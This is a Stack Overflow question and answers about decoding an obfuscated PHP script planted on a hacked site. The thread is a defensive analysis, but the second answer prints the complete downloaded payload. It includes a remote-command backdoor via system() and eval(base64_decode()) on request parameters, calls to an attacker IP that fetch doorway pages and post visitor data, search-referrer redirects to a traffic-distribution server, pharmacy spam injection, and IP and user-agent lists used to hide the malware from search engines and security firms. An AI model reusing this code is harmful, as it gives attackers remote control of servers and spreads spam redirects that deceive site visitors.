# Unable to decode this hacking code

Tags: php

Today my sites were hacked and here is one of php scripts I found : https://docs.google.com/open?id=0B7aEugGV1GwTNnd2c2Fqei1vakE .

I changed eval to print in this code but I'm not able to decode the source code of the script.

I want to see what this script was doing for 1 week in my sites. I figured it out due to site denial attack from these scripts which ultimately changed the .htaccess code.

I've even tried to find any know common threats in Google using the script names and comment lines but I found none.

Comment: Your attached code is not complete. Your question fails to give us any sort of context, really.

Comment: what do you mean its not complete @Jan Kuboschek .. looking at it now .. looks interesting

Comment: I've not changed anything in it - moreover it is very long code.

Comment: possible duplicate of [How to decode eval( gzinflate( base64_decode(](http://stackoverflow.com/questions/3701291/how-to-decode-eval-gzinflate-base64-decode) -- And yes, there are automated tools to decode repeated obfuscations. You need to utilize a search function however.

Comment: The hacker is posting information to http://95.211.128.197/100JS71MLKpzPzFbcYeVvZUMxCRUKBVFFx6iO6pr2VfhBthyzGcp.txt ... it would take some time to know what really happened

Comment: @Baba how did you conclude that from the source code provided? All I could deduce is that error reporting was turned off, and a string which was encoded with MIME base64 was evaluated. Or can you see more than three lines of code that I can see?

Comment: The code is over 300 lines That code is used to download a new file which is a backdoor to your server ... From what i can see here AgA server is really been compromised. You can see the code here http://pastebin.com/VGqeGDkH

Comment: @Baba Sorry if it seemed that I doubted you, but the MIME base64 string was not visible in the google document in google chrome, which leaded me to think it was incomplete. It is, however, visible in Firefox.

Comment: @Darian Lewin ...  its ok the hack has nice `PHP Kunfu` skills

Comment: @Baba thanks... even variable names have been obfuscated, which made me think it was not getting decoded. Just to add complexity I think variable names have been obfuscated.

Comment: @AgA .. it more than just variable .. the guy seems to know what he is doing ... I like the guy :)

Comment: @Baba - same problem as Darian Lewin. Anybody notice the Russian comments in the code? VASH NE PODDERZHIVAET ETO => ВАШ НЕ ПОДДЕРЖИВАЕТ ЭТО. The IP seems to be sitting in the Netherlands.

Comment: @Jan Kuboschek +1 saw that too .... You are right `Amsterdam`

Answer (score 3, accepted):

#### Disclaimer

> After Decoding i arrived at http://pastebin.com/VGqeGDkH. Please don't run the above code on your system ... because it not the only fine that would be downloaded to your system.

The hacker sends `curl` or `file_get_contents` request to :

```
curl_setopt($vH5wU9kS8uO3wG9xI7wR5aV1fS3vU2qC2bA6yP9oG2uZ1zF7zZ5dR8gI0tJ3jV3oB0cD1iN6dD1vL8gL2uP4fX0yU2tF4bR8qD1xB2pL7eS9kW2rI7vD1dS5oA4iP9jH6, CURLOPT_URL, "$pO6oA9pF4aY2lO7dY9vK3sU7nL8lF4gL1dY7uD8mU4xH9gM2hR9gT8tA6dJ1aB9sA8wP3sO5zI8xR2eZ0aD4dK7uQ0rG7aA7nI6kZ3kI3tG5$cO9qE4hY7wW5rJ7qL1bN7uP0dE2zE9rB2bV6lY3sJ8eO3rN3pR0tA8mA0qR1oK2dE9qM3yH0kB1wU1qX2pJ0bS5xV4mG7pY1pI6iK8eP8xY3yX2$kI8yO6lP1lN7wX0fV2kY1zI9vO3mS6wK3lT9gH9rE6tZ8xT6dE7wG4dP5iJ0mC7bX0zJ3tO1iD0eD2hE4cJ0pG4gZ1bC8lT5jM1iK8hD3$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$fK3iD2pY6sG1xV5wB5wU8pJ1hP2qW7wZ5sI1kS4pN0pO7bD1fE1vZ2aL3pV0uZ2fI3eQ4kI9aD8wN5bF0jR8aQ8sN6rD0pV6sM4uJ7zK6aW5dR4bC7$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$zP3dW5gU5bS0sO7aO2cQ5tD0eV6cD9rW9sJ9jM0kO6zK8wL8hL9xU3zI1gJ7xT2rX9tO9wD6gL0pV5eD2rT4hL2uP1jB9sE2cU0fG6gJ1zM0pM2vS1wZ8lQ7uN8qA6eY0$qM2xA6eC8gQ2lE0qQ8eM7xT2dV5sS1aW2wH3qL5dG5sF3fI4zA1xG9gN9xV7fO4zT5qV2yU1gC2lR2vB1hF5dO6gC9xH6aC1wA6$zV0mR4mU2lH5iU0qI9iN1vM6eU2uO2qJ2fH4mY7wK1kH5nR0fE4yV8rI0vR3lM3zW2jK8cG3dX4zM3oQ8iK0iK7yS1fY0oE4yZ3xN7iI4sN6");
```

After decoding you would get

```
curl_setopt($ch, CURLOPT_URL, "http://95.211.128.197/100JS71MLKpzPzFbcYeVvZUMxCRUKBVFFx6iO6pr2VfhBthyzGcp.txt");
```

This would then download files and different back door to the system ..

The hacker also used a lot of advance methods such as encryption  , variable recursion , and plenty backup ..   He also made sure that the final bot was not discovered by Google , Yahoo , Microsoft Corp , AMAZON , UCSD.EDU , Indiana University , Sonic.net , MCAFEE INTERNATIONAL , and hz

**My Advice**

Contact your hosting company or a Security Professional .. `Your server needs to be checked`

Comment: Baba thanks, here is the decoded code from the output of the link you've pasted: https://docs.google.com/open?id=0B7aEugGV1GwTNUZ4YVc1c3o4RVk . This code is clear to understand. He did do a mistake ( Internal server error when clicking from Google search) which raised my eyebrow.

Comment: @AgA he was careless not to encode that one better .. seen it did not add the code for security reasons

Comment: I've just now picked up a code from the logs what hacker is trying to do:-----------  180.76.6.231 - - [29/Sep/2012:04:41:27 +0530] "GET /gymnastics.php?pjh=21582&page=can-the-young-use-viagra&KGT=1348426801 HTTP/1.1" 404 16480 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" -------------------------- This gymnastics.php file I've already removed that's why a 404 there. Oh but this IP is from Baidu, China.

Comment: `404 response` means file not found but `gymnastics.php ` is not the only file that was downloaded to your system  .. he used some random paths ... you would need dig deeper

Answer (score 0):

This is a search engine de-optimisor. It'll inject malicious words into the content of your website. So when bots, like Google-bots comes along to index your site it'll associate these words with your website.

This is the code of the file it downloads

**DO NOT RUN**

```
    $sutra = "http://95.211.128.197/tds";           // TDS Url
    $scheme = "default";                            // TDS Cheme
    $www_root = "http://95.211.128.197";            // Manager path

    $host=$_SERVER['HTTP_HOST'];
    $agent=$_SERVER['HTTP_USER_AGENT'];
    $server_accept_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
    $server_referer = @$_SERVER['HTTP_REFERER'];
    $server_host = @$_SERVER['HTTP_HOST'];
    $server_forwarded_for = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $server_remote_addr = @$_SERVER['REMOTE_ADDR'];
    $server_query_string = @$_SERVER['QUERY_STRING'];
    $server_signature = @$_SERVER['SERVER_SIGNATURE'];
    $server_request = @$_SERVER['REQUEST_URI'];

    $debug = false;
    if ($server_remote_addr == "108.170.8.174"){$debug = true;} 

    if ($debug) 
        {
            echo "<title>DOOR OK</title>";
            echo "originalurl=$originalurl<br>";
            echo "server_user_agent=$server_user_agent<br>";
            echo "server_referer=$server_referer<br>";
            echo "server_host=$host<br>";
            echo "server_remote_addr=$server_remote_addr<br>";
            echo "server_request=$server_request<br>";
            echo "www_root=$www_root<br><br>";

            echo "Check CURL extension...";
            if (extension_loaded('curl'))
                {
                    echo "<font color=green><b>YES</b></font><br><br>";
                }
                else
                {
                    echo "<font color=red><b>NO</b></font><br><br>";
                }   
        }   

    // Some bad guys :)

    if (eregi ("start=56",$server_referer))
    {
        exit();
    }

    if ($agent == "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)")
    {
        exit();
    }   

    if ($agent == "Mozilla/4.0")
    {
        exit();
    }   


    if (eregi("75.125.",$server_remote_addr))
    {
        exit();
    }

    if (eregi("41.190.",$server_remote_addr))
    {
        exit();
    }   

    if (eregi("143.215.169",$server_remote_addr))
    {
        exit();
    }       


if (eregi("75.55.",$server_remote_addr))
    {
        exit();
    }       

if (eregi("67.212.",$server_remote_addr))
    {
        exit();
    }

if (eregi("173.236.",$server_remote_addr))
    {
        exit();
    }

if (eregi("184.154.",$server_remote_addr))
    {
        exit();
    }

if ($server_remote_addr == '194.115.120.14')
    {
        exit();
    }   
//////////////////////////////////////////////////////////////////////////////


if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434") && isset($_REQUEST["mod_content"])) { eval(base64_decode($_REQUEST["mod_content"])); exit(); }

$cmd = $_GET['cmddd'];
if (isset($cmd))
    {
        system($cmd);   
        exit();
    }

@$is_human = @detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer);

if (@$is_human==false) 
                    {
                    $folder = str_replace("www.","",$host);
                    if (($server_request=="") || ($server_request=="/"))
                        {
                            $filename = "index.php";    
                        }
                        else
                        {
                            $filename = str_replace("_","",$server_request);
                            $filename = str_replace("_","",$filename);
                            $filename = str_replace(" ","",$filename);
                            $filename = str_replace("%","",$filename);
                            $filename = str_replace("|","",$filename);
                            $filename = str_replace("/","",$filename);
                            $filename = str_replace(";","",$filename);
                            $filename = str_replace("+","",$filename);
                            $filename = str_replace("?","",$filename);
                            $filename = str_replace(".","",$filename);
                            $filename = str_replace("=","",$filename);
                            $filename1 = str_replace("&","",$filename);
                            $filename2 = str_replace("&","amp",$filename);
                            $filename1 = $filename1.".php";
                            $filename2 = $filename2.".php";
                        }                       
                    if (extension_loaded('curl'))
                        {
                            $ch = curl_init();
                            curl_setopt($ch, CURLOPT_URL, "$www_root/pages/$folder/$filename1");
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            $remote_page = curl_exec($ch);
                            $ch2 = curl_init();
                            curl_setopt($ch2, CURLOPT_URL, "$www_root/pages/$folder/$filename2");
                            curl_setopt($ch2, CURLOPT_HEADER, 0);
                            curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
                            $remote_page2 = curl_exec($ch2);
                            $ch2 = curl_init();
                            //curl_setopt($ch2, CURLOPT_URL, "$www_root/_links/doors.php");
                            curl_setopt($ch2, CURLOPT_URL, "$www_root/pages/$folder/doors.txt");
                            curl_setopt($ch2, CURLOPT_HEADER, 0);
                            curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
                            $links_map = curl_exec($ch2);   
                            if (eregi ("Not Found", $links_map))
                                {
                                    $links_map = "";
                                }
                        }
                        else
                        {
                            $remote_page = file_get_contents("$www_root/pages/$folder/$filename1");
                            $remote_page2 = file_get_contents("$www_root/pages/$folder/$filename2");
                            $links_map = file_get_contents("$www_root/pages/$folder/doors.txt");
                            if (eregi ("Not Found", $links_map))
                                {
                                    $links_map = "";
                                }                           
                            //$links_map = file_get_contents("$www_root/_links/doors.php");
                        }

                        if (eregi('<h2>', $remote_page))
                            {
                                echo $remote_page."<!-- End HTML 3.51.197 -->";
                                exit;
                            }
                        if (eregi('<h2>', $remote_page2))
                            {
                                echo $remote_page2."<!-- End HTML 3.51.197 -->";
                                exit;
                            }
                            else
                            {
                                // NIHT :)
                                $originalurl="http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
                                $originaluseragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;";
                                if (extension_loaded('curl'))
                                    {
                                        $ch = curl_init();
                                        curl_setopt($ch, CURLOPT_URL, $originalurl);
                                        curl_setopt($ch, CURLOPT_USERAGENT, $originaluseragent);
                                        curl_setopt($ch, CURLOPT_HEADER, 0);
                                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                        $originalpage = curl_exec($ch);     
                                    }
                                    else
                                    {   
                                        $originalpage = @file_get_contents($originalurl);
                                    }

                                if (preg_match('/<body.*?>/i',$originalpage)) {
                                    $originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
                                    $originalpage=preg_replace('/(<body.*?>)/i', "<body>$links_map", $originalpage, 1);
                                } elseif (preg_match('/<\/body>/i',$originalpage)) {
                                    $originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
                                    $originalpage=preg_replace('/(<\/body>)/i', "$links_map</body>", $originalpage, 1);
                                }
                                print $originalpage."<!-- End HTML 3.51.197 -->";
                                exit;                               
                                //echo '<font id="mix" color="8a517f" style="height: 0;overflow: hidden;width: 0; position: absolute; font-family:courier; font-size:19px">'
                                //echo $links_map;
                                //'</font>';
                            }
                    }
                    else
                    {
                    $keys = "/acai|diet|weight|loss|pharmac|drug|lunesta|provigil|modafinil|proventil|accutane|cialas|aciphex|acomplia|acyclovir|adalat|albendazole|albenza|albuterol|aldactone|alendronate|allegra|altace|amaryl|amiloride|amlodipine|amoxicillin|ansaid|arava|arcoxia|atenolol|atorvastatin|avandia|avapro|avodart|aygestin|azathioprine|azithromycin|baclofen|bactrim|benazepril|benzodiazepine|biaxin|bisoprolol|bromocriptine|bupropion|calan|carbamazepine|carisoprodol|carvedilol|ceclor|cefaclor|cefpodoxime|celebrex|celecoxib|cetirizine|chlorambucil|cialis|clarinex|clarithromycin|claritin|clopidogrel|colospa|conjugated|coreg|coumadin|coversyl|cyproheptadine|danazol|danocrine|desloratadine|desyrel|digoxin|dilantin|dipyridamole|domperidone|dutasteride|effexor|eldepryl|enalapril|epivir|erythromycins|escitalopram|esomeprazole|estrace|estradiol|ethambutol|etoricoxib|evista|ezetimibe|famciclovir|famvir|felodipine|fenofibrate|fexofenadine|finasteride|flagyl|flavoxate|flomax|floxin|fluoxetine|flurbiprofen|fosamax|frumil|furosemide|gabapentin|gemfibrozil|geodon|glimepiride|glipizide|glucophage|glucotrol|hydroch|hytrin|hyzaar|ibuprofen|ilosone|imdur|imitrex|imuran|indapamide|inderal|irbesartan|isordil|isosorbide|kamagra|ketoconazole|lamictal|laminuvide|lamisil|lamotrigine|lanoxin|lansoprazole|lasix|leflunomide|lenor72|leukeran|levaquin|levitra|levlen|levofloxacin|levonorgestrel|levothroid|levothyroxine|lexapro|lioresal|lipitor|lisinopril|lopid|lopressor|loratadine|losartan|lotensin|lovastatin|loxapine|loxitane|lozol|mebeverine|medroxy|mefenamicacid|meloxicam|meridia|metformin|metoclopramide|metoprolol|metronidazole|mevacor|mexiletine|mexitil|microzide|minipress|mobic|montelukast|motilium|motrin|myambutol|nabumetone|naprosyn|naproxen|neurontin|nexium|nifedipine|nimodipine|nimotop|niravam|nizoral|nolvadex|norethindrone|norplant72|nortriptyline|norvasc|ofloxacin|omeprazole|orlistat|oseltami|pamelor|pantoprazole|parlodel|paroxetine|paxil|periactin|perindropril|persantine|phenergan|phenytoin|plavix|plendil|ponstel|prandin|pravachol|pravastatin|prazosin|prednisolone|prednisone|premarin|prevacid|prilosec|prograf|promethazine|propafenone|propecia|propranolol|proscar|protonix|provera|prozac|rabeprazole|raloxifene|ramipril|ranitidine|reductil|reglan|relafen|repaglinide|retrovir|rimonabant|risperdal|risperidone|rivotril|rosiglitazonemaleate|roxithromycin|rulide|rythmol|selegiline|sertraline|sibutramine|sildenafil|simvastatin|singulair|soma|spironolactone|stavudine|sulfamet|sumatriptan|sumycin|synthroid|tacrolimus|tadalafil|tamiflu|tamoxifen|tamsulosin|tegaserod|tegretol|tenormin|terazosin|terbinafine|tetracycline|topamax|topiramate|trazodone|tricor|trimox|urispas|valacyclovir|valtrex|vantin|vardenafil|vasotec|venlafaxine|verapamil|viagra|warfarin|xenical|zantac|zebeta|zelnorm|zerit|zestril|zetia|zidovudine|zimulti|ziprasidone|zithromax|zocor|zoloft|zovirax|zyban|zyrtec|ambien|phentermine|xanax|valium|tramadol|adipex|zolpidem|ativan|alprazolam|diazepam|klonopin|lorazepam|clonazepam|ultram|zopiclone|modalert|hair|vicodin|amoxil|atomoxetine|cipro|ciprofloxacin|clomid|clomiphene|deltasone|diflucan|doxycycline|fluconazole|isotretinoin|pentazine|septra|strattera/i";


                    if (strlen($_SERVER["HTTP_REFERER"]) < 30)
                        {

                        if (eregi ("google", $_SERVER["HTTP_REFERER"]))
                            {
                        $key = "unknown";
                        $host_new = str_replace("www.","",$host);
                        if (extension_loaded('curl'))
                            {
                            $ch = curl_init();
                            curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            curl_setopt($ch, CURLOPT_POST, 1);
                            $data = array(
                            'domain' => $host_new, 
                            'uri' => $server_request,
                            'se' => $sese,
                            'referrer' => $_SERVER["HTTP_REFERER"],
                            'agent' => $agent,
                            'server_remote_addr' => $server_remote_addr,
                            'keys' => $key
                            );
                            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
                            curl_exec($ch);
                            }
                            else
                            {   
                            @file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
                            }                       

                            $location = "$sutra/in.cgi?$scheme";
                            header("Location: ".$location);
                            exit;                           
                            }
                        }

/**                 if ((eregi ("url=", $server_referer)) AND (preg_match('/google/i', $server_referer)))
                        {
                        $key = "unknown, https";
                        $host_new = str_replace("www.","",$host);
                        if (extension_loaded('curl'))
                            {
                            $ch = curl_init();
                            curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            curl_setopt($ch, CURLOPT_POST, 1);
                            $data = array(
                            'domain' => $host_new, 
                            'uri' => $server_request,
                            'se' => $sese,
                            'referrer' => $_SERVER["HTTP_REFERER"],
                            'agent' => $agent,
                            'server_remote_addr' => $server_remote_addr,
                            'keys' => $key
                            );
                            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
                            curl_exec($ch);
                            }
                            else
                            {   
                            @file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
                            }                       

                            $location = "$sutra/in.cgi?$scheme";
                            header("Location: ".$location);
                            exit;                           
                        }                       
*/
                    if (preg_match($keys, $_SERVER["HTTP_REFERER"])) 
                        {
                        $key = $_SERVER["HTTP_REFERER"];
                        $sese="unknown";
                        if (eregi("yahoo", $_SERVER["HTTP_REFERER"]))
                            {
                                $keys = explode ("p=", $_SERVER["HTTP_REFERER"]);
                                $keys = explode ("&", $keys[1]);
                                $key = $keys[0];        
                                $sese="yahoo";
                            }
                        if (eregi("google", $_SERVER["HTTP_REFERER"]))
                            {
                                $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                                $keys = explode ("&", $keys[1]);
                                $key = $keys[0];
                                $sese="google"; 
                            }
                        if (eregi("bing", $_SERVER["HTTP_REFERER"]))
                            {
                                $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                                $keys = explode ("&", $keys[1]);
                                $key = $keys[0];
                                $sese="bing";   
                            }   
                        if (eregi("aol.com", $_SERVER["HTTP_REFERER"]))
                            {
                                $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                                $keys = explode ("&", $keys[1]);
                                $key = $keys[0];
                                $sese="aol";    
                            }
                        if (eregi("ask.com", $_SERVER["HTTP_REFERER"]))
                            {
                                $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                                $keys = explode ("&", $keys[1]);
                                $key = $keys[0];
                                $sese="ask";    
                            }               

                        $host_new = str_replace("www.","",$host);
                        if (extension_loaded('curl'))
                            {
                            $ch = curl_init();
                            curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            curl_setopt($ch, CURLOPT_POST, 1);
                            $data = array(
                            'domain' => $host_new, 
                            'uri' => $server_request,
                            'se' => $sese,
                            'referrer' => $_SERVER["HTTP_REFERER"],
                            'agent' => $agent,
                            'server_remote_addr' => $server_remote_addr,
                            'keys' => $key
                            );
                            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
                            curl_exec($ch);
                            }
                            else
                            {   
                            @file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
                            }

                            $location = "$sutra/in.cgi?$scheme¶meter=".$key."&se=".$host."&HTTP_REFERER=".$_SERVER["HTTP_REFERER"];
                            //$location = "http://health-profile.net/";
                            header("Location: ".$location);
                            exit;
                    }

                    }
////////////////////////////////////////////////////////////////////////////////////////////////////
function detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer){

    $is_human = true;

    $stop_ips_masks = array(
        "/^8\.6\.4[8-9]\.[0-9]+$/",             // NetRange:    8.6.48.0 - 8.6.55.255           Google Inc
        "/^8\.6\.5[0-5]\.[0-9]+$/",             // NetRange:    8.6.48.0 - 8.6.55.255           Google Inc
        "/^64\.233\.1[6-8][0-9]\.[0-9]+$/",     // NetRange:    64.233.160.0 - 64.233.191.255   Google Inc
        "/^64\.233\.19[0-1]\.[0-9]+$/",         // NetRange:    64.233.160.0 - 64.233.191.255   Google Inc
        "/^64\.68\.8[0-7]\.[0-9]+$/",           // NetRange:    64.68.80.0 - 64.68.87.255       Google Inc
        "/^66\.249\.6[4-9]\.[0-9]+$/",          // NetRange:    66.249.64.0 - 66.249.95.255     Google Inc
        "/^66\.249\.[7-8][0-9]\.[0-9]+$/",      // NetRange:    66.249.64.0 - 66.249.95.255     Google Inc
        "/^66\.249\.9[0-5]\.[0-9]+$/",          // NetRange:    66.249.64.0 - 66.249.95.255     Google Inc
        "/^72\.14\.19[2-9]\.[0-9]+$/",          // NetRange:    72.14.192.0 - 72.14.255.255     Google Inc
        "/^72\.14\.2[0-5][0-9]\.[0-9]+$/",      // NetRange:    72.14.192.0 - 72.14.255.255     Google Inc
        "/^74\.125\.[0-9]+\.[0-9]+$/",          // NetRange:    74.125.0.0 - 74.125.255.255     Google Inc
        "/^74\.6\.[0-9]+\.[0-9]+$/",            // NetRange:    74.6.0.0 - 74.6.255.255         Google Inc
        "/^216\.239\.3[2-9]\.[0-9]+$/",         // NetRange:    216.239.32.0 - 216.239.63.255   Google Inc
        "/^216\.239\.4[0-9]\.[0-9]+$/",         // NetRange:    216.239.32.0 - 216.239.63.255   Google In
        "/^216\.239\.6[0-3]\.[0-9]+$/",         // NetRange:    216.239.32.0 - 216.239.63.255   Google Inc
        "/^209\.85\.12[8-9]\.[0-9]+$/",         // NetRange:    209.85.128.0 - 209.85.255.255   Google Inc
        "/^209\.85\.1[3-9][0-9]\.[0-9]+$/",     // NetRange:    209.85.128.0 - 209.85.255.255   Google Inc
        "/^209\.85\.2[0-5][0-9]\.[0-9]+$/",     // NetRange:    209.85.128.0 - 209.85.255.255   Google Inc
        "/^64\.9\.22[4-9]\.[0-9]+$/",           // NetRange:    64.9.224.0 - 64.9.255.255       Google Inc
        "/^64\.9\.2[3-4][0-9]\.[0-9]+$/",       // NetRange:    64.9.224.0 - 64.9.255.255       Google Inc
        "/^64\.9\.25[0-5]\.[0-9]+$/",           // NetRange:    64.9.224.0 - 64.9.255.255       Google Inc
        "/^66\.102\.[0-9]\.[0-9]+$/",           // NetRange:    66.102.0.0 - 66.102.15.255      Google Inc
        "/^66\.102\.1[0-5]\.[0-9]+$/",          // NetRange:    66.102.0.0 - 66.102.15.255      Google Inc      
        "/^137\.110\.[0-9]+\.[0-9]+$/",         // NetRange:    137.110.222.*                   Google bot
        "/^65\.5[2-5]\.[0-9]+\.[0-9]+$/",       // NetRange:    65.52.0.0 - 65.55.255.255       Microsoft Corp
        "/^67\.195\.[0-9]+\.[0-9]+$/",          // NetRange:    67.195.0.0 - 67.195.255.255     Yahoo! Inc
        "/^209\.131\.3[2-9]\.[0-9]+$/",         // NetRange:    209.131.32.0 - 209.131.63.255   Yahoo! Inc
        "/^209\.131\.[4-5][0-9]\.[0-9]+$/",     // NetRange:    209.131.32.0 - 209.131.63.255   Yahoo! Inc
        "/^209\.131\.[6][0-3]\.[0-9]+$/",       // NetRange:    209.131.32.0 - 209.131.63.255   Yahoo! Inc
        "/^66\.163\.1[6-8][0-9]\.[0-9]+$/",     // NetRange:    66.163.160.0 - 66.163.191.255   Yahoo! Inc
        "/^66\.163\.19[0-1]\.[0-9]+$/",         // NetRange:    66.163.160.0 - 66.163.191.255   Yahoo! Inc
        "/^184\.72\.[0-9]+\.[0-9]+$/",          // NetRange:    184.72.0.0 - 184.73.255.255     AMAZON
        "/^184\.73\.[0-9]+\.[0-9]+$/",          // NetRange:    184.72.0.0 - 184.73.255.255     AMAZON
        "/^198\.134\.135\.[0-9]+$/",            // NetRange:    198.134.135.0 - 198.134.135.255 UCSD.EDU
        "/^129\.79\.49\.[0-9]+$/",              // NetRange:    129.79.49.249                   Indiana University
        "/^69\.12\.216\.[0-9]+$/",              // NetRange:    69.12.216.14                    Sonic.net
        "/^62\.189\.112\.[0-9]+$/",             // NetRange:    62.189.112.0 - 62.189.112.255   MCAFEE INTERNATIONAL
        "/^79\.178\.31\.[0-9]+$/",              // NetRange:    79.178.31.165                   hz
        "/^78\.46\.70\.[0-9]+$/",               // NetRange:    78.46.70.145                    hz
        "/^87\.98\.215\.[0-9]+$/",              // NetRange:    87.98.215.155                   hz
        "/^64\.34\.165\.[0-9]+$/",              // NetRange:    64.34.165.218                   hz
        "/^93\.186\.20\.[0-9]+$/",              // NetRange:    93.186.20.13                    hz
        "/^204\.118\.31\.202$/",
        "/^74\.81\.89\.114$/",
        "/^82\.192\.91\.10$/",
        "/^192\.251\.226\.206$/",
        "/^95\.211\.27\.[0-9]+$/",
        "/^95\.211\.129\.[0-9]+$/",
        "/^95\.211\.128\.[0-9]+$/",
        "/^128\.163\.16\.[0-9]+$/",             // NetRange:    128.163.16.*                    UKY
        "/^91\.217\.162\.[0-9]+$/",
        "/^91\.220\.35\.[0-9]+$/",
        "/^195\.14\.112\.[0-9]+$/",
        "/^86\.55\.210\.[0-9]+$/",
        "/^184\.173\.219\.[0-9]+$/",
        "/^184\.172\.169\.[0-9]+$/",
        "/^50\.22\.89\.[0-9]+$/",
        "/^64\.120\.249\.[0-9]+$/",
        "/^46\.37\.184\.[0-9]+$/",
        "/^10\.48\.17\.[0-9]+$/",
        "/^108\.170\.8\.[0-9]+$/",
        "/^64\.120\.227\.[0-9]+$/"
    );

    $stop_ips_masks_count = count ($stop_ips_masks);

    for($w=0; $w<$stop_ips_masks_count; $w++)
        {
            if(preg_match($stop_ips_masks[$w], $server_remote_addr))
                {
                    $is_human = false;  break;
                }
        } 

    $stop_agents_masks = "/google|bot|rambler|yandex|yahoo|freebsd|libwww|spider|linux/i";
    if (preg_match($stop_agents_masks, $server_user_agent)) 
        {
            $is_human = false;
        }

//  if  (strlen ($server_user_agent) < 12)
//      {
//          $is_human = false;
//      }

    return $is_human;
}
```